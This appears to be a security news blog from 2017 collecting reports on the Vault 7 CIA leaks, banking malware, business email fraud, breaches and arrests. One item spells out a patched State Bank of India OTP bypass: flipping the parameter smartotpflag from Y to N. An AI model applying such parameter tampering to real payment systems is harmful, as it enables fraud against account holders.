Wednesday 29 March 2017

Wikileaks dump second part of CIA dump

Wikileaks has recently published the codenamed Vault 7 containing details on the work of the Central Intelligence Agency (CIA). On March 23, they published the second part of documents, the dump is called "Dark matter".

The documents in "Dark matter" consists of several projects of the CIA, which have security services that can infect the Apple equipment (Mac, iPhone) with sustainable  Malware. This Malware can continue to remain in the firmware even after you reinstall the OS.

The first publication was known as "Year zero" (Year Zero), and it contained  8761 documents and files. Most of the documents belonged to an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virgina.

For security reasons, the tool was described such as the Sonic Screwdriver,  a method designed to execute code on a peripheral device, while Mac is loaded. With the help of this hackers can easily attack.

According to the documents, it shows that the CIA used modified adapters Thunderbolt-to-Ethernet to store malicious code. While, you can easily implant "DarkSeaSkies" in the EFI on the Apple MacBook Air and it contains some very useful tools like DarkMatter, SeaPea, and NightSkies, for EFI, for space of kernel and user.

After Wikileaks published the first part of the dump, the Apple representative assured that the bugs have been corrected, and the new version was already released and there is nothing to worry about now, but now the Apple is silent on the release of the second dump

Sunday 12 March 2017

Brit ISP TalkTalk blocks control tool TeamViewer

To stop scammers fooling people into using the software and handing over their PCs

TalkTalk has blocked remote desktop management tool TeamViewer from its network, following a spate of scammers using the software to defraud customers.
A spokeswoman for the UK ISP confirmed it had blocked "a number of sites and applications" including TeamViewer from its network to protect customers from phishing and scamming activities.
The company said it was working with TeamViewer and other third parties on implementing some additional security measures to enhance security.
TeamViewer is one of the most popular pieces of software to enable remote access. It was also used by hundreds of scammers attempting to defraud TalkTalk customers by gaining remote access to their computers.
TeamViewer has previously said it takes the security and privacy of its customers "extremely seriously" and "condemns the use of TeamViewer to subvert systems and gain unauthorised access to private data."
Customers complained on TalkTalk's forum this afternoon they were unable to use the software.
One said they spent the whole morning trying to fix the problem, using three different computers which failed to connect to TeamViewer via TalkTalk's SuperRouter.
"I tried to connect by tethering my computer to iPhone 4G - and it connected to TeamViewer straight away. [When I went] back to router [I] lost connection. Loads of reports on the internet about no connection via TalkTalk - why are they blocking it?"
Another said: "This is completely unsatisfactory. If this can't be resolved then I'll have no alternative but to switch ISP and also recommend that my main clients do also."
In the forum, TalkTalk noted the number of complaints it receives from customers regarding these tools through fraudulent activities "is significant" but said it hoped to resolve the issue with TeamViewer and the other third party wares affected.
The ISP's spokeswoman said: “We constantly monitor for potentially malicious internet traffic, so that we can protect our customers from phishing and scamming activities.
"As part of this work, we have recently blocked a number of sites and applications from our network, and we’re working hard to minimise the impact on our customers.
“We would also urge our customers to visit our Beat the Scammers website to find out more about how they can keep themselves safe online.”

That CIA exploit list in full: The good, the bad, and the very ugly

We're still going through the 8,761 CIA documents published on Tuesday by WikiLeaks for political mischief, although here are some of the highlights.
First, though, a few general points: one, there's very little here that should shock you. The CIA is a spying organization, after all, and, yes, it spies on people.
Two, unlike the NSA, the CIA isn't mad keen on blanket surveillance: it targets particular people, and the hacking tools revealed by WikiLeaks are designed to monitor specific persons of interest. For example, you may have seen headlines about the CIA hacking Samsung TVs. As we previously mentioned, that involves breaking into someone's house and physically reprogramming the telly with a USB stick. If the CIA wants to bug you, it will bug you one way or another, smart telly or no smart telly. You'll probably be tricked into opening a dodgy attachment or download.
That's actually a silver lining to all this: end-to-end encrypted apps, such as Signal and WhatsApp, are so strong, the CIA has to compromise your handset, TV or computer to read your messages and snoop on your webcam and microphones, if you're unlucky enough to be a target. Hacking devices this way is fraught with risk and cost, so only highly valuable targets will be attacked. The vast, vast majority of us are not walking around with CIA malware lurking in our pockets, laptop bags, and living rooms.
Thirdly, if you've been following US politics and WikiLeaks' mischievous role in the rise of Donald Trump, you may have clocked that Tuesday's dump was engineered to help the President pin the hacking of his political opponents' email server on the CIA. The leaked documents suggest the agency can disguise its operations as the work of a foreign government. Thus, it wasn't the Russians who broke into the Democrats' computers and, by leaking the emails, helped swing Donald the election – it was the CIA all along, Trump can now claim. That'll shut the intelligence community up. The President's pet news outlet Breitbart is already running that line.
Back to the leaked files. One amusing page gives details of discussions within the CIA on how to avoid having its secrets leak in the wake of the theft of the NSA Equation Group's hacking tools. Along with a detailed report [PDF] on the Equation Group hack, there are suggestions on how to protect resources.
The CIA and the White House have yet to comment on the veracity of the leaked material and are unlikely to do so. But at least one former intelligence worker with knowledge of such matters seems convinced they are real.
So here's a rundown of the highlights so far. With so much material to go through, some important things will have been missed. Feel free to add your own insights in the comments section. We note that a good number of these cyber-weapons were obtained from the NSA, GCHQ or private computer security researchers, and hoarded without warning vendors in case vulnerabilities are patched – we've covered this subject over and over.
  • Windows: The CIA's UMBRAGE team has a modest collection of attack tools for systems powered by Microsoft's widely used operating system, all listed here. These tools include keystroke loggers, sandbox escape ropes, and antivirus avoidance mechanisms. The CIA analysts found flaws in Control Panel, and the ability to add data streams to NTFS without detection to smuggle data onto storage drives. Windows library files are useful stepping stones to malicious code execution, as are Windows Theme files. DLL files [PDF] are a popular attack vector for the CIA PDF]. They are also handy for concealing malware in applications, and the documents show that common apps have been used for spying by exploiting DLL weaknesses.
    One DLL attack technique shows that someone at the agency is a bit of a Will Ferrell fan. The RickyBobby program, named after the character in the film Talladega Nights, uses several .NET DLLs and a Windows PowerShell script to implant a "listening post" on a target Windows PC.
    A version has been used in the field on USB drives, according to this document. The software, with attack tools dubbed Fight Club, was put onto six thumb drives and "inserted into the supply chain of a target network/group."
    If you're using Windows Exchange 2010, the CIA has a tool for that, dubbed ShoulderSurfer. This performs a code injection attack against the Exchange Datastore manager process that would allow an agent to collect emails and contacts at will and without the need for an individual's credentials.
    Exchange 2007 is even easier to crack, according to the CIA. For a detailed rundown on Exchange and all its flaws, this document [PDF] should be helpful to Microsoft engineers looking to fix the problems.
  • OS X: Users of Apple's OS X shouldn't look too smug, however. The CIA has tools for you too – pages of them. A lot of hacking tools cover OS X El Capitan, but presumably these have been updated to subvert new versions of the operating system. That said, it does seem through reading these files that Apple poses a significantly more difficult challenge for the CIA than Redmond's code.
    Analysts note that the operating system can be resilient to applications that try to slip malware onto a Mac. But it's still possible to whitelist spying software; subvert NetInstall images, creating zombie programs; and surreptitiously get at the kernel.
    One interesting project the files touch on is dubbed QuarkMatter. This is a technique for hiding spying software persistently on an OS X system by using an EFI driver stored on the EFI system partition. Another, dubbed SnowyOwl, uses a pthread in an OpenSSH client to potentially pull off remote monitoring of a target system.
    The documents also show a project called HarpyEagle that analyzed Apple's Airport Extreme firmware for private keys, and also Time Capsule systems.
  • iOS: The CIA files show an extensive list of iOS exploits. Some of these were developed in-house, some obtained from the NSA or Britain's GCHQ, and others were purchased from private vendors. It looks as though at least some of the security bugs were fixed by Apple in recent iOS updates – versions 8 and later – or are otherwise no longer exploitable. For instance, the Redux sandbox workaround and Xiphos kernel exploit were both used to hack "iPhone 4S and later, iPod touch (5th generation) and later, iPad 2 and later," but both flaws were fixed after being publicized by the Chinese jailbreaker Pangu. While it's likely the exploit list is an old one, a lot of them may still work. iOS 8 appears to have killed off a few, but most of the exploits don't have death dates listed.
    The Dyonedo exploit, developed by GCHQ, allows unsigned code to run on iOS devices, while the CIA's homegrown Persistence tool allows "a symbolic link [to] be created (on iOS 7.x) or an existing file can be overwritten (iOS 8.x) that will run our bootstrapper, giving [users] initial execution on every boot."
    While full root is a goal, the documents also detail an attack known as Captive Portal. This sets up the browser to route all web use through a server run by the CIA.

Cybercrime even has its own religion in Ghana

Nigerian prince
Spoofed email and malware hidden in attachments netted crooks in West Africa more than $3bn in three years from businesses.
That's according to research carried out by the International Criminal Police Organization (Interpol) and infosec biz Trend Micro. Forget claims of money stuck in bank accounts. Scammers are now raking it in from so-called business email compromise (BEC) schemes, according to the security team.
A BEC crook sends authentic-looking invoices and internal memos to businesses and their finance staff, tricking the employees into paying money into the thieves' accounts. The messages can also be booby-trapped with malware that infects work PCs and logs key-strokes. This information is then used to log into the company's online bank account, and transfer money to criminals' pockets.
The Interpol-Trend study found that between October 2013 and May 2016, BEC scammers walked off with more than $3bn having exploited the technique globally.
Such frauds are becoming a serious pain in the fundament: the FBI warned last year that they had siphoned over $1bn from American companies. Victims of BEC scams included the city of El Paso, in Texas, America, which got scammed out of $3.2m, and Austrian engineering firm FACC, which lost over $54m. Much of the money in both cases has now been recovered – but by no means all of it, and the problem is getting worse.
"West African cybercriminals are clearly shifting to more elaborate crimes, complex operations, and business models – BEC and tax fraud, in particular," the report [PDF] states.
"Armed with their social engineering expertise and ingenuity, and augmented by tools and services (keyloggers, RATs, crypters, counter-AV services, etc), West African cybercriminals are stealing large amounts of money via crimes targeting individuals and companies worldwide."
Quite why West Africa is such a hotspot for online crime isn't hard to work out – education and motive. Around half of all university graduates in West Africa are unemployed a year after graduation and so the lure of crime is strong.
It's now so established in some cultures that it has entered the pantheon of religion in Ghana, under the name Sakawa. The fraudsters make offerings to a supreme being that will protect their fraud from being discovered and ensure good fortune.
The study identified two big gangs working in the regions. The first, known as the Yahoo! Boys, concentrate largely on the traditional types of fraud like 419 scams – where an online figure (typically a bogus Nigerian prince or foreign lawyer) promises a big payout if the victim coughs up fees to free up the supposed fortune.
The Yahoo! Boys – so named because until recently they used the failing portal's chat tools to coordinate their scams – also carry out romance scams, forming faux relationships with the lonely and then 'borrowing' money for plane tickets to consummate the relationship. Another is the so-called "send money" scam, whereby they pretend to be a foreign traveler who has been mugged and needs funds from friends and family.
Typically members of the Yahoo! Boys are in their twenties, like to show off their wealth on social media, and operate in small, local groups. While their methods of fraud are relatively unsophisticated, they still make a good living.
More dangerous are what the study calls next-level cybercriminals. This group is generally older, doesn't show off their wealth, and operates in a more sophisticated way. It concentrates on BEC fraud and also harvests financial details to scam funds from victims with fake tax returns.
Next-level cybercriminals are highly professional, running money-laundering operations, a network of money mules, and working closely with relatives in the target countries to smooth out the scamming process. It's this group that has been raking in the billions.
Interpol reports some limited success in shutting down these groups, but says that for all the tips they pass on to local police, only about 30 per cent end up in an arrest. As ever with online crime, finding the physical location of the criminals is a major issue.

WikiLeaks Dumps Docs on CIA’s Hacking Tools

WikiLeaks on Tuesday dropped one of its most explosive word bombs ever: A secret trove of documents apparently stolen from the U.S. Central Intelligence Agency (CIA) detailing methods of hacking everything from smart phones and TVs to compromising Internet routers and computers. KrebsOnSecurity is still digesting much of this fascinating data cache, but here are some first impressions based on what I’ve seen so far.
First, to quickly recap what happened: In a post on its site, WikiLeaks said the release — dubbed “Vault 7” — was the largest-ever publication of confidential documents on the agency. WikiLeaks is promising a series of these document caches; this first one includes more than 8,700 files allegedly taken from a high-security network inside CIA’s Center for Cyber Intelligence in Langley, Va.
The home page for the CIA's "Weeping Angel" project, which sought to exploit flaws that could turn certain 2013-model Samsung "smart" TVs into remote listening posts.
The home page for the CIA’s “Weeping Angel” project, which sought to exploit flaws that could turn certain 2013-model Samsung “smart” TVs into remote listening posts.
“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized ‘zero day’ exploits, malware remote control systems and associated documentation,” WikiLeaks wrote. “This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.”
Wikileaks said it was calling attention to the CIA’s global covert hacking program, its malware arsenal and dozens of weaponized exploits against “a wide range of U.S. and European company products, includ[ing] Apple’s iPhone, Google’s Android and Microsoft’s Windows and even Samsung TVs, which are turned into covert microphones.”
The documents for the most part don’t appear to include the computer code needed to exploit previously unknown flaws in these products, although WikiLeaks says those exploits may show up in a future dump. This collection is probably best thought of as an internal corporate wiki used by multiple CIA researchers who methodically found and documented weaknesses in a variety of popular commercial and consumer electronics.
For example, the data dump lists a number of exploit “modules” available to compromise various models of consumer routers made by companies like Linksys, Microtik and Zyxel, to name a few. CIA researchers also collated several pages worth of probing and testing weaknesses in business-class devices from Ciscowhose powerful routers carry a decent portion of the Internet’s traffic on any given day. Craig Dods, a researcher with Cisco’s rival Juniper, delves into greater detail on the Cisco bugs for anyone interested (Dods says he found no exploits for Juniper products in the cache, yet). Meanwhile, Cisco has published its own blog post on the matter.

WHILE MY SMART TV GENTLY WEEPS

Some of the exploits discussed in these leaked CIA documents appear to reference full-on, remote access vulnerabilities. However, a great many of the documents I’ve looked at seem to refer to attack concepts or half-finished exploits that may be limited by very specific requirements — such as physical access to the targeted device.
The “Weeping Angelproject’s page from 2014 is a prime example: It discusses ways to turn certain 2013-model Samsung “smart TVs” into remote listening devices; methods for disabling the LED lights that indicate the TV is on; and suggestions for fixing a problem with the exploit in which the WiFi interface on the TV is disabled when the exploit is run.
ToDo / Future Work:
Build a console cable
Turn on or leave WiFi turned on in Fake-Off mode
Parse unencrypted audio collection
Clean-up the file format of saved audio. Add encryption??
According to the documentation, Weeping Angel worked as long as the target hadn’t upgraded the firmware on the Samsung TVs. It also said the firmware upgrade eliminated the “current installation method,” which apparently required the insertion of a booby-trapped USB device into the TV.
Don’t get me wrong: This is a serious leak of fairly sensitive information. And I sincerely hope Wikileaks decides to work with researchers and vendors to coordinate the patching of flaws leveraged by the as-yet unreleased exploit code archive that apparently accompanies this documentation from the CIA.
But in reading the media coverage of this leak, one might be led to believe that even if you are among the small minority of Americans who have chosen to migrate more of their communications to privacy-enhancing technologies like Signal or WhatsApp, it’s all futility because the CIA can break it anyway.
Perhaps a future cache of documents from this CIA division will change things on this front, but an admittedly cursory examination of these documents indicates that the CIA’s methods for weakening the privacy of these tools all seem to require attackers to first succeed in deeply subverting the security of the mobile device — either through a remote-access vulnerability in the underlying operating system or via physical access to the target’s phone.
As Bloomberg’s tech op-ed writer Leonid Bershidsky notes, the documentation released here shows that these attacks are “not about mass surveillance — something that should bother the vast majority of internet users — but about monitoring specific targets.”
By way of example, Bershidsky points to a tweet yesterday from Open Whisper Systems (the makers of the Signal private messaging app) which observes that, “The CIA/Wikileaks story today is about getting malware onto phones, none of the exploits are in Signal or break Signal Protocol encryption.”
The company went on to say that because more online services are now using end-to-end encryption to prevent prying eyes from reading communications that are intercepted in-transit, intelligence agencies are being pushed “from undetectable mass surveillance to expensive, high-risk, targeted attacks.”
A tweet from Open Whisper Systems, the makers of the popular mobile privacy app Signal.
A tweet from Open Whisper Systems, the makers of the popular mobile privacy app Signal.
As limited as some of these exploits appear to be, the methodical approach of the countless CIA researchers who apparently collaborated to unearth these flaws is impressive and speaks to a key problem with most commercial hardware and software today: The vast majority of vendors would rather spend the time and money marketing their products than embark on the costly, frustrating, time-consuming and continuous process of stress-testing their own products and working with a range of researchers to find these types of vulnerabilities before the CIA or other nation-state-level hackers can.
Of course, not every company has a budget of hundreds of millions of dollars just to do basic security research. According to this NBC News report from October 2016, the CIA’s Center for Cyber Intelligence (the alleged source of the documents discussed in this story) has a staff of hundreds and a budget in the hundreds of millions: Documents leaked by NSA whistleblower Edward Snowden indicate the CIA requested $685.4 million for computer network operations in 2013, compared to $1 billion by the U.S. National Security Agency (NSA).

TURNABOUT IS FAIR PLAY?

NBC also reported that the CIA’s Center for Cyber Intelligence was tasked by the Obama administration last year to devise cyber attack strategies in response to Russia’s alleged involvement in the siphoning of emails from Democratic National Committee servers as well as from Hillary Clinton‘s campaign chief John Podesta. Those emails were ultimately published online by Wikileaks last summer.
the “wide-ranging ‘clandestine’ cyber operation designed to harass and ’embarrass’ the Kremlin leadership was being lead by the CIA’s Center for Cyber Intelligence.” Could this attack have been the Kremlin’s response to an action or actions by the CIA’s cyber center?
NBC reported that the “wide-ranging ‘clandestine’ cyber operation designed to harass and ’embarrass’ the Kremlin leadership was being lead by the CIA’s Center for Cyber Intelligence.” Could this attack have been the Kremlin’s response to an action or actions by the CIA’s cyber center? Perhaps time (or future leaks) will tell.
Speaking of the NSA, the Wikileaks dump comes hot on the heels of a similar disclosure by The Shadow Brokers, a hacking group that said it stole malicious software from the Equation Group, a highly-skilled and advanced threat actor that has been closely tied to the NSA.
What’s interesting is this Wikileaks cache includes a longish discussion thread among CIA employees who openly discuss where the NSA erred in allowing experts to tie the NSA’s coders to malware produced by the Equation Group. As someone who spends a great deal of time unmasking cybercriminals who invariably leak their identity and/or location through poor operational security, I was utterly fascinated by this exchange.

BUG BOUNTIES VS BUG STOCKPILES

Many are using this latest deluge from WikiLeaks to reopen the debate over whether there is enough oversight of the CIA’s hacking activities. The New York Times called yesterday’s WikiLeaks disclosure “the latest coup for the antisecrecy organization and a serious blow to the CIA, which uses its hacking abilities to carry out espionage against foreign targets.”
The WikiLeaks scandal also revisits the question of whether the U.S. government should instead of hoarding and stockpiling vulnerabilities be more open and transparent about its findings — or at least work privately with software vendors to get the bugs fixed for the greater good. After all, these advocates argue, the United States is perhaps the most technologically-dependent country on Earth: Surely we have the most to lose when (not if) these exploits get leaked? Wouldn’t it be better and cheaper if everyone who produced software sought to crowdsource the hardening of their products?
On that front, my email inbox was positively peppered Tuesday with emails from organizations that run “bug bounty” programs on behalf of corporations. These programs seek to discourage the “full disclosure” approach — e.g., a researcher releasing exploit code for a previously unknown bug and giving the affected vendor exactly zero days to fix the problem before the public finds out how to exploit it (hence the term “zero-day” exploit).
Rather, the bug bounties encourage security researchers to work closely and discreetly with software vendors to fix security vulnerabilities — sometimes in exchange for monetary reward and sometimes just for public recognition.
Casey Ellis, chief executive officer and founder of bug bounty program Bugcrowd, suggested the CIA WikiLeaks disclosure will help criminal groups and other adversaries, while leaving security teams scrambling.
“In this mix there are the targeted vendors who, before today, were likely unaware of the specific vulnerabilities these exploits were targeting,” Ellis said. “Right now, the security teams are pulling apart the Wikileaks dump, performing technical analysis, assessing and prioritizing the risk to their products and the people who use them, and instructing the engineering teams towards creating patches. The net outcome over the long-term is actually a good thing for Internet security — the vulnerabilities that were exploited by these tools will be patched, and the risk to consumers reduced as a result — but for now we are entering yet another Shadow Brokers, Stuxnet, Flame, Duqu, etc., a period of actively exploitable 0-day bouncing around in the wild.”
Ellis said that — in an ironic way, one could say that Wikileaks, the CIA, and the original exploit authors “have combined to provide the same knowledge as the ‘good old days’ of full disclosure — but with far less control and a great many more side-effects than if the vendors were to take the initiative themselves.”
“This, in part, is why the full disclosure approach evolved into the coordinated disclosure and bug bounty models becoming commonplace today,” Ellis said in a written statement. “Stories like that of Wikileaks today are less and less surprising and to some extent are starting to be normalized. It’s only when the pain of doing nothing exceeds the pain of change that the majority of organizations will shift to an proactive vulnerability discovery strategy and the vulnerabilities exploited by these toolkits — and the risk those vulnerabilities create for the Internet — will become less and less common.”
Many observers — including a number of cybersecurity professional friends of mine — have become somewhat inured to these disclosures, and argue that this is exactly the sort of thing you might expect an agency like the CIA to be doing day in and day out. Omer Schneider, CEO at a startup called CyberX, seems to fall into this camp.
“The main issue here is not that the CIA has its own hacking tools or has a cache of zero-day exploits,” Schneider said. “Most nation-states have similar hacking tools, and they’re being used all the time. What’s surprising is that the general public is still shocked by stories like these. Regardless of the motives for publishing this, our concern is that Vault7 makes it even easier for a crop of new cyber-actors get in the game.”

Sunday 26 February 2017

Microsoft opens Cybersecurity Engagement Center in Mexico

Microsoft has announced the opening of what it calls a Cybersecurity Engagement Center in Mexico. This will join the Transparency and Cybersecurity Center for Asia-Pacific, as well as the one in India, and its Redmond Cybercrime Center.
The complex, based in the country's capital city, will serve Mexico as well as other Latin American countries, in an effort to use technology, experience, and services to protect citizens and companies from an array of cyber threats.
As highlighted in the post, some of the main objectives of this facility are:
  • Taking advantage of Microsoft’s proactive role in matters of fighting cybercrime, particularly in the dismantling of criminal organizations that operate through Botnet schemes
  • Allowing cybersecurity experts from Mexico and elsewhere in Latin America to work with Microsoft specialists to fight cybercrime together
  • Acting as a headquarters for the development of training activities in order to support the building and strengthening of technical capabilities; these activities are geared toward authorities and the public sector
According to Jean-Philippe Courtois, Executive VP and President, Microsoft Global Sales, Marketing and Operations, this newly opened complex will work in tandem with the software giant's Redmond-based Cybercrime Center opened back in 2013. The Cybercrime Center was unveiled after the merger of the digital crimes and software piracy teams, which employed 30 staff at the time, collaborating with over 70 individuals worldwide to locate and fight hacker threats and malware.
Microsoft stated it is committed to invest in Latin America, by bringing over its cybersecurity capabilities to help governments identify "current threats that affect the economy’s prosperity". To make good on its promise, the company will use its "robust and trustworthy cloud computing" platform to fight cyber threats, as it has done in the past.
In concert with the opening of the facility, a Government Security Program was signed between the Redmond giant and the Federal Police (representing the Mexican government) to promote IT security. What this does is it gives participating authorities "access to the source code for current versions of Windows and Windows service packs, Windows Embedded CE, and Microsoft Office".
It is not the first time Microsoft has collaborated with authorities on this issue, as the company helped bring down the ZeroAccess botnet in conjunction with the FBI and Europol a few years ago.

63 Universities and US Government agencies breached by hacker

A “Russian-speaking and notorious financially-motivated” hacker, Rasputin has reportedly hacked the computer systems of various universities and government agencies of US and sold the stolen data on the dark web.

According to the cyber security research firm,  Recorded Future, the hackers gained access to computer systems of more than 63 universities and federal, state, and local U.S. government agencies. The prominent universities include Cornell and New York University.

The firm claimed that the victims are “intentional targets of choice based on the organization’s perceived investment in security controls and the respective compromised data value. Additionally, these databases are likely to contain significant quantities of users and potentially associated personally identifiable information (PII).”

The list of the Rasputin's targets are quite long and it does extend to the 10 U.K university and one Indian University in Delhi as well. All the hacked agencies and universities have been informed about the hack by the Recorded Future's researchers.

The victims include 16 U.S state government, 6 U.S. cities and four federal agencies, Child Welfare Information Gateway, which is operated by the U.S. Department of Health and Human Services, and   Fermi National Accelerator Laboratory, America’s premier particle physics lab. The severity of the breaches are unclear

The List of U.S University victims: Cornell University, University of the Cumberlands, VirginiaTech, Oregon College of Oriental Medicine, University of Maryland, Baltimore County, Humboldt State University, University of Pittsburgh, The University of North Carolina at Greensboro, New York University, University of Mount Olive, Rice University, Michigan State University, University of California, Los Angeles, Rochester Institute of Technology, Eden Theological Seminary, University of Tennessee, Arizona State University, St. Cloud State University, NC State University, University of Arizona, Purdue University, University at Buffalo, Atlantic Cape Community College, University of Washington.

The list of U.K University Victims: University of Cambridge, Coleg Gwent, University of Oxford, University of the Highlands and Islands, Architectural Association School of Architecture, University of Glasglow, University of Chester, the University of the West of England, University of Leeds, The University of Edinburgh.

And one Indian University: Delhi University.

Hackers could easily bypass SBI's OTP security

One Time Password (OTP) has become the new security feature on most of the websites, including the banks. This feature allows a user to make online transactions after the identity of the customer is verified by putting the OTP password sent to the registered mobile number from the bank. But who knew this security feature could be easily bypassed and lead to huge loss of money.

A white-hat hacker, bug bounty hunter and web application security researcher, Neeraj Edwards shared his research on how he could easily bypass the OTP of one of the most popular bank, State Bank of India (SBI) and could make the transaction with any amount.




While making a transaction, the last page of SBI’s website shows a One Time Password screen where there is a parameter called ‘smartotpflag is set to Y i.e. smartotpflag=Y’.


Smartotpflag parameter is used to generate OTP, and Y represents ‘yes’ to send the code to the registered mobile. However, the risk factor arises if someone changes ‘Y’ to ‘N’ which means ‘No’. The transaction then will be completed without entering the OTP.


Though after Edwards discovery, the vulnerability was patched but it was highly disappointing that the person who could have easily benefited from this vulnerability, but choose not to, was neither rewarded nor acknowledged for his work.

The press too could not make this important news to the papers, thus keeping the public in dark and keeping the discoverer from any achievement.

Spies Hack Israeli Soldiers' Android Phones

More than 100 soldiers from the Israel Defense Forces (IDF) have become the target of a cyberespionage group when information from their mobile devices was stolen using malicious Android applications.

ViperRAT, the clandestine hacking collective was found actively hijacking soldiers’ Android-based smartphones to remotely siphon images and audio directly from the devices.

Highly sophisticated malware allowed the attackers to control each phone’s microphone and camera. In effect, the hackers could eavesdrop on soldiers’ conversations and peer into live camera footage — wherever an affected smartphone’s camera would be pointed, that vantage point could have also been viewable to the hackers.

A list of installed apps on the infected mobile device is also sent out by the dropper. Some variants will pretend to be chat apps, another variant will pretend to be a YouTube layer, depending on what's already installed on the device.

Other Android smartphone applications common to Israeli citizens and available in the Google Play store — including a billiards game, an Israeli Love Songs player, and a Move To iOS app — where found to contain hidden ViperRat malware.

While the malicious actors behind ViperRAT have yet to be explicitly identified, their activity patterns suggest that the cyberespionage is being carried out by a group operating out of the Middle East.

Google looks to hire Australian hackers

Google is searching for Australia’s best and brightest hackers to employ them for hard-to-fill cyber security positions at the search giant’s own business. The tech giant's Australian hiring raid may likely exacerbate the IT skills shortage in government agencies.

This step has been taken by the Google because of a difficulty in finding the right mix of people to take up cyber security positions. Despite the various specialised courses offered by Australian universities, not many appear to be interested in taking up the courses. The number of people taking up information and communications technology degrees has halved over the last decade according to the Government's Cyber Security Strategy.

Moreover, “it’s difficult to find such people who have the skills of hacking into a system but ultimately want to make it more secure and not use those skills negatively and are also willing to work in a big software company,” said Google Chrome’s security head, Parisa Tabriz.

The shortage can also be felt by Google which is now looking to hire as many quality cyber security positions in Australia as it can.

But Google’s gain could be government’s loss. The federal government expects demand for cyber security services and related jobs — such as legal services, insurance and risk management — will grow by at least 21% over the next five years.

The government services though have been competing with private firms on salaries. It is a common problem for governments across the globe when attempting to attract people for jobs, to fall short of being able to provide the kind of salaries and perks that private firms serve up to prospective employees.

Two weeks ago, the giant US-based telco Verizon announced it has strengthened its armoury in the fight against cyber adversaries with its investment in next-generation security capabilities at its Asia-Pacific Advanced Security Operations Centre in Canberra.

The opening of the new security centre followed Verizon’s appointment last December to the federal government’s new whole of government telecommunications services panel which provides coordinated telecommunications services.

Thursday 16 February 2017

Hitachi Payment services accepts its systems were compromised

Hitachi payment Services conducted an audit regarding security breach that had compromised about 3.2 million credit cards issued by Indian banks in October 2016, after Reserve bank of India ordered an audit four months back.

The company confirmed on Thursday that their system was affected by "a sophisticated injection of malware (malicious software code)", that hampered detail of debit cards issued by banks.

Hitachi Payment Services, a firm that provides ATMs, point of sale and other services in India, said security audit firm SISA Information Security has completed its final assessment report on the breach and discovered  that the highly sophisticated malware had worked undetected and concealed its tracks during the compromise period between May 21 and July 11 , 2016.

“While the behavior of the malware and the penetration into the network has been deciphered, the amount of data ex filtrated during the above compromise period is unascertainable due to secure deletion by the malware,” said a statement released by Hitachi Payment Services.

According to the National Payments Corporation of India (NPCI), which looks at payment system in India discovered that almost 90 ATMs in the country were compromised through malware and least 641 customers across 19 banks lost Rs 1.3 crore to fraudulent transactions on their debit cards.

Loney Antony, managing director of Hitachi Payment Services said, “…we confirm that our security systems had a breach during mid-2016. As soon as the breach was discovered, we followed due process and immediately informed the RBI, National Payments Corporation of India (NPCI), banks and card schemes. We also partnered with banks to ensure the safety of their customers’ sensitive data. As a result, the extent of compromise was limited and we have not seen any further misuse due to the containment measures deployed by Hitachi Payment Services"

HACKING GANG AT LARGE FOR STEALTH



The hacker group in the Russian Federation, whose members are under the radar of stealing funds from accounts of Russian financial institutions, was dismantled. The Spokesman of the Ministry of Internal Affairs of the Russian Federation Irina Wolf stated.

"In May 2016, after effective interaction between the Ministry of Internal Affairs and the Federal Security Services the Russian Federation, an unprecedented interdiction operation had been carried out against the hacker group, whose members had lived in 17 different locations of the country and had been a part of misappropriation of funds from accounts of Russian financial institutions since 2013, Wolf stated in the report, published on the website of the Ministry of Internal Affairs. For the period of its activity, 50 members had managed to transfer more than 1 billion rubles."

The Spokesman of the Ministry of Internal Affairs added to her statement that other than bank accounts, attackers had also hacked critical infrastructure, including strategic industrial enterprises. 

Searches were conducted, during which computers, media devices and means of communication, as well as funded and edged weapons were seized.

"At the moment 27 organizers and participants of the group, of this 19 suspects, held criminal liable. The court had ordered their remand in custody", - the statement reflected on the website. The matter remains under investigation.

Friday 10 February 2017

Feds Bust Alleged Russian Bank Hacker in Los Angeles

A federal investigation into a Russian cybercrime ring led Secret Service agents to the doorstep of a 29-year-old Los Angeles man the United States calls an “extremely sophisticated and well-connected cybercriminal” who allegedly used malware to steal cash from thousands of U.S. bank accounts.
Alexander Tverdokhlebov was arrested in an early-morning raid Feb. 1 on a four-count wire-fraud indictment alleging that he worked with a Russian colleague in 2009 and 2010 to attack U.S. financial institutions. He allegedly used a botnet of 10,000 hacked PCs.
Tverdokhlebov is being held in the Metropolitan Detention Center in Los Angeles pending a bail review in Alexandria, Virginia, where he’s charged.
Long before the Kremlin was known for hacking political campaigns, Russian hackers and their peers in Ukraine dominated the for-profit cybercrime underworld, from the large-scale credit-card heists of the mid-2000s to today’s ransomware threat. And banking botnets have been a staple of Russian cybercrime for nearly a decade.
Instead of stealing passwords for a hacker to use later, the malware will wait for the victim to log in to their online banking, then splice itself into the connection and slip in a rogue funds transfer without setting off alarms at the bank. If the victim happens to check their balance or transaction history, the malware will even rewrite it on the fly to conceal the theft.
The Russian-made Zeus malware first proved the concept in 2009, and is behind, by some estimates, billions of dollars in losses over the years. Zeus’s alleged author, Evgeniy Bogachev, was even among the Russians sanctioned by President Obama last December in retaliation for the Kremlin’s election hacking, and the FBI has a $3 million reward out for his arrest.
The U.S. discovered Tverdokhlebov while examining the online chats of a different Russian: Vadim Polyakov, a 32-year-old St. Petersburg man who pleaded guilty last year to a million-dollar concert-ticket scam. Polyakov ran a crime ring that hacked consumers’ StubHub accounts to buy thousands of e-tickets for resale. He was arrested in Spain and extradited to the U.S. In July, a New York judge sentenced him to four to 12 years in state prison.
Court records don’t indicate how the Secret Service obtained Polyakov’s ICQ chat logs. The most likely scenario is that Spanish authorities seized Polyakov’s laptop at his arrest. In any event, the chat logs showed Polyakov conversing in Russian with a fellow cyberthief who let slip enough information to identify Tverdokhlebov as a suspect, specifically his first name, his girlfriend’s full name, and his home address and his phone number.
The indictment against Tverdokhlebov is based entirely on the years-old chats, with no hard information about specific thefts, suggesting that the feds are using it as a wedge to try and pry more evidence from Tverdokhlebov’s arrest and the search of his computers.
Over government objections, a magistrate judge set Tverdokhlebov’s bail at $100,000 last week but stayed the man’s release pending a government appeal, set to be heard in Virginia on Friday. The feds are urging that Tverdokhlebov be held without bail, claiming that he has few ties to the U.S. and enough underworld contacts to flee to Mexico and from there to Russia.
Tverdokhlebov was born in Russia and obtained U.S. citizenship in 2009 after marrying an American. According to prosecutors, the two have since divorced.
